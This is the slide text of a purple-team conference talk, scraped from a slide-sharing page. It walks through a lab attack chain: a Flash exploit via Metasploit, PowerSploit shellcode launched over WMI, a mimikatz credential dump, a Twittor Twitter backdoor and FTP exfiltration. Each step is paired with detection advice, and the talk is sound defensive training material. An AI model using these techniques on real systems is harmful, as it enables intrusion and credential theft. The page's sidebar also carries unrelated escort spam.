Derbycon - Passing the TorchWill Schroeder
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
Evolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceEvolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceJorge Orchilles
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersJorge Orchilles
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 
Wordpress security
Wordpress securityWordpress security
Wordpress securityMehmet Ince
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara
 

Similar a Purple View (20)

DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
 
ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!
 
Network security
Network securityNetwork security
Network security
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
Evolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceEvolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV Conference
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red Teamers
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building Better
 
Wordpress security
Wordpress securityWordpress security
Wordpress security
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
 

Último

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 

Último (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 

Purple View

  • 1. Purple View The recent trend of using Attack and Defense Together Not OUR idea - backed by many @raffertylaura | @haydnjohnson
  • 2. Quick who are we Haydn Johnson @haydnjohnson OSCP Offensive/Attack Interest Enjoys presenting Laura @raffertylaura MSc Computer Science (Security/Privacy) Interested in both sides of security Loooooves presenting @raffertylaura | @haydnjohnson
  • 3. Contents 1. Basic Term Definition 2. Introduction to Red, Blue and Purple 3. Run through of an Attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack: ○ Attacking View ○ Defenders View ○ Possible Purple Team exercises @raffertylaura | @haydnjohnson
  • 4. Definitions Exploit - The thing used to gain unauthorized access to a system Payload - What is done after the access is gained (shell, command) Metasploit - An open source exploit framework, modular Meterpreter - an advanced, extensible payload that uses in-memory DLL injection Shell - Gaining Terminal/CMD access remotely https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ http://www.metasploit.com/
  • 5. Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn’t @raffertylaura | @haydnjohnson
  • 6. Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More Logs @raffertylaura | @haydnjohnson
  • 7. Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight Gaps in Security Controls, detection etc ● Escape and Evade for Persistence @raffertylaura | @haydnjohnson
  • 8. Blue Team - Goals ● Detect Attack ● Respond and Recover ● Produce Actionable Intelligence ● Identify Gaps and investment needs @raffertylaura | @haydnjohnson
  • 9. Purple Team - Offensive & Defensive Working together to achieve the ultimate goal of making the organization more secure ● Exposes blue team to different threats & attacker mindset ● Test incident detection and response ● Allows red team to sharpen skills ● Policy and procedures tested ● Tuning of controls @raffertylaura | @haydnjohnson
  • 10. Purple Team - Offensive & Defensive Different types of Purple Teaming ● Read Team Sitting with Network Defense team ● Adversary Simulation ● Traffic Generation ● cobaltstrike.com ● Wargaming Requires total picture involving all areas of the organization @raffertylaura | @haydnjohnson
  • 11. Purple Team - The difference ● Using Security Posture and Weaknesses to find what is most valuable ● Goal Oriented ● Review attack ● Test how teams use services and how they are managed @raffertylaura | @haydnjohnson
  • 12. Purple Team - The difference ● Time to Domain Admin ● Time to Data/Objective ● Time to Respond ● Time to Recover ● Identify where there needs to be more investment ● Measure Impact Done right, the blue team should come out with better monitoring and response plans. @raffertylaura | @haydnjohnson
  • 13. Purple Team - The difference ● Set up a fake scenario - Assume Breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers, block IP addresses, make it realistic @raffertylaura | @haydnjohnson
  • 14. Purple Team - Exercise “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/ @raffertylaura | @haydnjohnson
  • 15. Purple Team - DEMO (step by step) Our exercise @raffertylaura | @haydnjohnson
  • 16. Purple Team - Demo Architecture @raffertylaura | @haydnjohnson Domain: corp.test.com
  • 17. Tools Used Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor Blue Team: ● Wireshark ● Windows Event Logs @raffertylaura | @haydnjohnson
  • 18. Setting up Windows GP @raffertylaura | @haydnjohnson
  • 19. Gaining Access Hacking Team Flash Exploit @raffertylaura | @haydnjohnson
  • 20. Flash Exploits @raffertylaura | @haydnjohnson ● Flash plugins are vulnerable ○ You can embed a javascript/binary within a Flash file ○ ActionScript to define events to redirect to landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default on browser ● New vulnerabilities are identified on almost a weekly basis
  • 21. Gaining Access @raffertylaura | @haydnjohnson Flash 18.0.0.194
  • 22. A: Flash Exploit from SecurityFocus Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
  • 23. A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
  • 24. A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
  • 25. Client1 User navigates to malicious site which redirects to the exploit A: Redirect Victim @raffertylaura | @haydnjohnson
  • 26. A: Client1 is exploited @raffertylaura | @haydnjohnson
  • 27. A: A session is now established with Client1 We can now run Meterpreter @raffertylaura | @haydnjohnson
  • 28. B: Wireshark: Landing Page and Redirect @raffertylaura | @haydnjohnson
  • 30. B: What can you take away Security Onion, implement it, free Has snort rules for Flash exploits (need to install) Confirm if flash is needed for business reasons Keep flash updated 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules) @raffertylaura | @haydnjohnson https://www.security-database.com/detail.php?alert=CVE-2015-5119 https://security-onion-solutions.github.io/security-onion/
  • 31. Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective ● Red team sees how attacks are visible by blue team and think of ways to make it more stealthy @raffertylaura | @haydnjohnson
  • 33. Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin @raffertylaura | @haydnjohnson
  • 35. A: PowerSploit Available on Github Open Source https://github.com/mattifestation/PowerSploit @raffertylaura | @haydnjohnson
  • 36. A: PowerSploit More than 1 script! PowerShell Modules @raffertylaura | @haydnjohnson
  • 37. PowerView Part of PowerShell Empire Very advanced https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView @raffertylaura | @haydnjohnson
  • 38. A: Lateral Movement The same local Administrator account passwords on multiple computers. by Sean Metcalf https://adsecurity.org/?p=1684 @raffertylaura | @haydnjohnson
  • 39. Same Passwords for All Local Admins
  • 41. A: Lateral Movement Powersploit Remote Powershell Using Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
  • 42. A: Base64 Encoding Payload Remove issues with whitespace The Hacker Playbook 1 (now 2) @raffertylaura | @haydnjohnson http://thehackerplaybook.com/dashboard/
  • 43. A: Hosting Powersploit Invoke--Shellcode.ps1 PowerSploit code hosted on local Kali machine @raffertylaura | @haydnjohnson
  • 44. A: Invoke-WmiMethod Use powershell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process. @raffertylaura | @haydnjohnson
  • 45. A: Execute Remote command Execute command from Client1 to tell Client2 to download and execute shellcode @raffertylaura | @haydnjohnson
  • 46. A: Client1 gives same password Same password across multiple clients @raffertylaura | @haydnjohnson
  • 48. B: WireShark traffic TCP Hand Shake Bind Requests @raffertylaura | @haydnjohnson
  • 49. B: Client1 requests remote instance on Client2 @raffertylaura | @haydnjohnson
  • 50. B: Client2 eventually asks where is Kali @raffertylaura | @haydnjohnson
  • 51. B: Client2 downloads Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
  • 52. B: Client1 logs into Client2 @raffertylaura | @haydnjohnson
  • 53. B: PowerShell Process Created @raffertylaura | @haydnjohnson
  • 54. B: PowerShell connects to Kali Client2 reaches out to Kali on port 80 @raffertylaura | @haydnjohnson
  • 55. B: What can you take away Event Correlation - based on event ID, source and destination for remote connections Implement alerting based on Security Events together SIEM can/SHOULD do this Use Log MD - really great logging tool, especially for powershell @raffertylaura | @haydnjohnson http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting- through-the-junk http://malwarearchaeology.squarespace.com/log-md/
  • 56. Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm Defensive Controls in Place ● Identify what worked, what did not ● Implement changes ● Justification for resources @raffertylaura | @haydnjohnson
  • 57. Privilege Escalation Local Admin to Domain Admin @raffertylaura | @haydnjohnson
  • 58. A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson ● Why escalate privileges from Local Admin to Domain Admin? ● Domain admin - control over active directory! ● Access IT resources ● Create accounts ● Propagate malware
  • 59. A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson
  • 60. A: Local Admin to Domain Admin From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll @raffertylaura | @haydnjohnson
  • 61. A: Local Admin to Domain Admin Use psexec to run mimikatz.exe on Client2 @raffertylaura | @haydnjohnson
  • 62. A: Local Admin to Domain Admin Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2! @raffertylaura | @haydnjohnson
  • 64. B: Event Logs Client1 logs into Client2 local admin
  • 65. B: Event Logs Client1 runs mimikatz on Client2 @raffertylaura | @haydnjohnson
  • 66. B: Event Logs Sensitive privilege use from Client1 to Client2
  • 67. B: What can you take away ● Prevention: ○ Access control for shared drive ○ Limit access to psexec and monitor use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case - Event correlation between system logs and network proxy logs ○ For lateral movement: enable file level auditing ○ Canary accounts
  • 68. Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind from this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provide more thorough recommendations @raffertylaura | @haydnjohnson
  • 70. A: Twittor ● Easy to install ● Easy to Use ● Easy to add Shellcode https://github.com/PaulSec/twittor @raffertylaura | @haydnjohnson
  • 71. A: Twittor - insides Simple Subprocess execution Stored as base64 encoded message
  • 72. A: Pyinstaller On Github Turn Python file into EXE @raffertylaura | @haydnjohnsonhttps://github.com/pyinstaller/pyinstaller
  • 73. A: Pyinstaller Python File becomes Executable @raffertylaura | @haydnjohnson
  • 74. @raffertylaura | @haydnjohnson Twittor: Backdoor Using Twitter
  • 75. A: Twittor Python file used as C2 Server Python file used as backdoor EXE - Pyinstaller @raffertylaura | @haydnjohnson
  • 76. A: Twittor - Retrieving command Send Command to execute Retrieve command @raffertylaura | @haydnjohnson
  • 77. B: Twittor - Network Traffic Reaching out to API Normal User Traffic?? @raffertylaura | @haydnjohnson
  • 78. B: Twittor - Client system Backdoor as Python Executable compiled with --no-console flag to hide output @raffertylaura | @haydnjohnson
  • 79. B: Traffic from Client Reaches out to twitter Src and Destination are internal IPs, sends to API @raffertylaura | @haydnjohnson
  • 80. B: What can you take away Check if there are any remote connections after hours, is it against policy? Again, Correlate logs with known C2 addresses See if AV picks it up @raffertylaura | @haydnjohnson
  • 81. Purple Team - Benefits Test if a C2 can reach out to twitter. Social Media may be blocked via the browser, but some sites can still be accessed via API etc. If it is not blocked, why not, can your blue team help to stop this and others. @raffertylaura | @haydnjohnson
  • 82. Data Exfiltration Clear Text FTP @raffertylaura | @haydnjohnson
  • 83. @raffertylaura | @haydnjohnson A: Data Exfiltration Through Clear Text FTP
  • 84. A: FTP Extraction Finding Data to extract @raffertylaura | @haydnjohnson
  • 85. A: Finding data Important data identified @raffertylaura | @haydnjohnson
  • 88. B: Meterpreter connection DLL injection Lots of chatter @raffertylaura | @haydnjohnson
  • 89. B: FTP connection Clear Text @raffertylaura | @haydnjohnson
  • 91. B: What can you take away? @raffertylaura | @haydnjohnson Disable FTP - should not have a business need for it really If there is a business need whitelist those IP addresses | Create a group of users specifically for FTP
  • 92. Purple Team - Exercise Clear Text Will any alarms trigger? Understand potential holes in alerting Measure time to detect and respond @raffertylaura | @haydnjohnson
  • 93. Conclusion Purple Teaming is Good @raffertylaura | @haydnjohnson
  • 94. Purple Team - Reiteration Provides more value than a Penetration Test Should be implemented into a regular schedule Helps train security personnel Helps make sure your boxes are tuned @raffertylaura | @haydnjohnson
  • 95. Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark, (and a bit of Snort) ● Could be extended for enterprise security tools such as SIEM/IDS ● Powershell/WMI for blue team ● More advanced attacks, persistence using Powershell Empire @raffertylaura | @haydnjohnson
  • 97. References are in following slides @raffertylaura | @haydnjohnson
  • 98. Microsoft - 8 minute Video https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/ @raffertylaura | @haydnjohnson
  • 99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 http://www.slideshare.net/beltface/hybrid-talk @raffertylaura | @haydnjohnson
  • 100. A: Downloads PowerShell file Client2 reaches out to Kali machine @raffertylaura | @haydnjohnson